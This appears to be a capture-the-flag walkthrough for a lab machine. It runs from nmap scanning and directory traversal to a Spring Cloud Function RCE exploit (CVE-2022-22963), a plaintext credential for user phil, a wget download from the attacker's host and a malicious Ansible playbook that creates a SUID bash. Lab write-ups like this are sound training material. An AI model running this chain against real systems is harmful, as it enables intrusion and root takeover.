nmap -p- --min-rate 10000 10.10.11.204 -Pn
After discovering open ports, let's do greater nmap scan.
nmap -A -sC -sV -p22,8080 10.10.11.204
After accessing application, I can't find interesting thing to hack.
Let's do directory brute-force.
feroxbuster -u http://10.10.11.204:8080
I found /show-image
endpoint on web application make enumeration on this.
Let's do Directory Traversal
attack to read system files.
I found pom.xml
file on /var/www/WebApp
directory.
Let's read content of this.
I found that there's 'Spring Cloud Function' is used via outdated version '3.2.2' and have RCE
exploit.
That's CVE-2022-22963.
python3 exploit.py -u http://10.10.11.204:8080/
Let's make interactive shell.
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo; fg
export TERM=xterm
export SHELL=bash
I found settings.xml
file which contains sensitive credentials on frank
's home directory.
phil: DocPhillovestoInject123
Let's switch into this user via su - phil
command.
user.txt
I upload pspy64
file into machine.
1.First, open http server.
python3 -m http.server --bind 10.10.16.7 8080
2.Second, let's download this binary.
wget http://10.10.16.7:8080/pspy64
I see that background job is ansible_playbook
runs .yml
files for /opt/automation
directory.
Let's create malicious .yml
file which makes copy of /bin/bash
and add SUID
binary into this.
- hosts: localhost
tasks:
- name: 'dr4ks owns inject'
shell: cp /bin/bash /tmp/dr4ks; chmod 4777 /tmp/dr4ks
After this executed , I can see this via ls -al /tmp/dr4ks
.
Let's execute this binary ./dr4ks -p
.